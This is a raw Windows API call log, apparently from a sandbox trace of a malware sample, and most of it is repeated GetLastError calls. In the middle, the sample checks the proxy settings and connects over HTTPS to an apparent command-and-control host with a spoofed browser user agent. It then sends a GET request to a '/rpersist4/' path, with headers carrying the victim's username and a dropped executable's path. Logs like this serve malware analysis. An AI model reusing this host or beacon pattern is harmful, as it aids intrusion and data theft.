	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.037] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.038] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.039] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.040] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.041] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.042] GetLastError () returned 0x0
	[0123.043] GetLastError () returned 0x0
	[0123.043] GetLastError () returned 0x0
	[0123.059] GetLastError () returned 0x0
	[0123.059] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.068] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.069] GetLastError () returned 0x0
	[0123.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f8d8 | out: phkResult=0x205f8d8*=0x2dc) returned 0x0
	[0123.070] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0123.070] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x69d538, lpcbData=0x205f8dc*=0x4 | out: lpType=0x0, lpData=0x69d538*=0x0, lpcbData=0x205f8dc*=0x4) returned 0x0
	[0123.070] RegCloseKey (hKey=0x2dc) returned 0x0
	[0123.070] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0123.070] InternetConnectA (hInternet=0xcc0004, lpszServerName="spop.lestanzedifederica.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.070] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.071] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.072] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.073] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] lstrlenA (lpString="/rpersist4/1197631235") returned 21
	[0123.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x73c368, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0123.074] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.074] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.075] wsprintfW (in: param_1=0x396d0f0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.075] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.075] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0123.075] GetLastError () returned 0x0
	[0123.075] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.076] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetLastError () returned 0x0
	[0123.077] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x68b1c0, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0123.077] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0123.077] lstrlenW (lpString="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0123.077] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0123.077] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x69c) returned 0x0
	[0123.077] RegQueryValueExW (in: hKey=0x69c, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.077] RegQueryValueExW (in: hKey=0x69c, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.077] RegQueryValueExW (in: hKey=0x69c, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.077] RegCloseKey (hKey=0x69c) returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.078] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.079] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
	[0123.080] GetLastError () returned 0x0
